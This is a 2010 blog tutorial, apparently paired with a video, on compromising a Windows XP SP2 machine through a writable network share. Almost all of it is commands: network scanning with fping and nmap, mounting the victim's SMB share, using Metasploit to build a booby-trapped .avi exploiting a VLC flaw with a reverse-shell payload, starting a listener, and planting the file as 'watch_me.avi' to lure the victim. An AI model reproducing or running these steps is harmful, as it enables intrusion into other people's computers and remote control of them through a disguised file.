Saturday, September 4, 2010

Sickness - Owning a windows xp with metasploit.



Ok so first of all I did not do any video editing, so don't complain about it !
Second of all excuse me if I made some English mistakes I'm not a perfect English speaker.
Third this is a basic video.

So in this tutorial I am going to show you how to own a windows XP SP2 who has the folder "My Documents" shared with read/write permissions by uploading an infected .avi file to the victim's machine.

The tools used: fping, nmap, metasploit, inguma

Commands:
Code:

fping -g 192.168.1.60 192.168.1.70
nmap -sS -sV -f -n -O 192.168.1.66
cd /pentest/exploits/framework3/
./msfconsole
cd /pentest/exploits/inguma
./inguma.py
autoscan
192.168.1.66
y
n
cd /pentest/python/impacket-examples/
./smbclient
open 192.168.1.66
login username password
shares
smbmount //192.168.1.66/Documents /media/
cd /media/
ls

Metasploit commands (making the infected .avi):
Code:

search vlc
use windows/fileformat/videolan_tivo
set PAYLOAD windows/shell_reverse_tcp
show options
set FILENAME watch_me.avi
set OUTPUTPATH /root/sickness/desktop/
set LHOST 192.168.1.64
exploit

Metasploit handler:
Code:

use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.1.64
exploit

Code:

cd /root/sickness/desktop
mv -f watch_me.avi /media/Downloads
smbumount /media

1 comment:

  1. ... [Trackback]...

    [...] Read More: sickness.tor.hu/?p=259 [...]...

    ReplyDelete